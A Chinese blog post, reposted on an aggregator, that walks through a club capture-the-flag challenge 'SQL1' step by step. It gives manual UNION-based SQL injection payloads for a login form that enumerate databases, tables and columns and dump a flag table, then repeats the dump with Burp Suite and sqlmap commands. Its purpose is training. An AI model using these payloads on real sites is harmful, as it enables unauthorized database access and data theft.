码迷,mamicode.com
首页 > 数据库 > 详细

SQL1

时间:2016-12-01 01:57:12      阅读:420      评论:0      收藏:0      [点我收藏+]

标签:src   blog   登录   ima   font   alt   16px   表示   sel   

这是社团的题目,我现在就写出来吧,总共两种方法,一种手注,一种用工具(sqlmap).

一、手注(盲注)

1,我们打开题目,可以看到一个登陆页面,这是我们在输入框里面输入万能密码:  ‘ and ‘1‘=‘      ,然后我们在密码框输入   ‘ and ‘1‘=‘1‘ union select 1,group_concat(schema_name),3 from information_schema.schemata#   ,

技术分享

这里上面的输入框是and,是为了让上面的报错,下面的输入框是and,是为了union后面的语句成功执行。这里我们是先爆出来数据库,可以看到如图所示的源码(这里看源码的时候千万不要点确认,要用Ctrl+u来看)。

技术分享

技术分享

2,这时我们爆出了数据库,下面我们爆表,我们在上面的输入框输入   ‘ and ‘1‘=‘1   ,在下面输入‘ and ‘1‘=‘1‘ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()# ,"database()表示当前的数据库"

技术分享

3,爆出来了表,看到flag,是不是很激动,嘿嘿,接下来我们爆字段,

上面的输入框输入‘ and ‘1‘=‘1    ,下面的输入框输入‘ and ‘1‘=‘1‘ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x666C6167#   ,这里的  0x666C6167  是flag的十六进制编码,因为在数据库里面,数据库和表和字段都是以十六进制储存的。

技术分享

4,上面的输入框输入‘ and ‘1‘=‘1   ,下面的输入框输入 ‘ and ‘1‘=‘1‘ union select 1,group_concat(id,0x7e,flag),3 from flag# ,这里我们就可以看到flag了。

技术分享

5,现在是不是感觉很简单啊,至此我的工作完成,你们的工作还得继续。任重而道远!

 

 

二、工具(sqlmap)

1,打开登录页面,在输入框里面里面随便输入数字,然后抓包(这里用burp suite抓包,没有这个工具的可以找我)得到数据,如下面的图所示。

技术分享

2,把图中的数据复制下来,在sqlmap目录下面新建一个1.txt,文件,把复制的数据放1.txt文件里面,

然后打开sqlmap,输入sqlmap.py -r 1.txt --dbs   ,如下图所示

技术分享

3,得到下面数据。

技术分享

4,得到库,接下来输入 sqlmap.py -r 1.txt -D web --tables   ,这里也可以输入sqlmap.py -r 1.txt --tables -D web,结果都是一样的,

----爆表----。

技术分享

5,得到表,下面爆字段,输入sqlmap.py -r 1.txt -D web -table flag --columns或者sqlmap.py -r 1.txt --columns -table flag -D web

技术分享 技术分享

6,下面就爆内容了,输入sqlmap.py -r 1.txt -D web -T flag -C flag --dump  或者输入sqlmap.py -r 1.txt  --dump -D web -T flag -C flag    结果如图所示

技术分享

7,在你们joker学长的帮助下(到用的他的图),终于完成了。(注:上面那些表,可以不用双引号的)。

 

SQL1

标签:src   blog   登录   ima   font   alt   16px   表示   sel   

原文地址:http://www.cnblogs.com/Oran9e/p/6120048.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!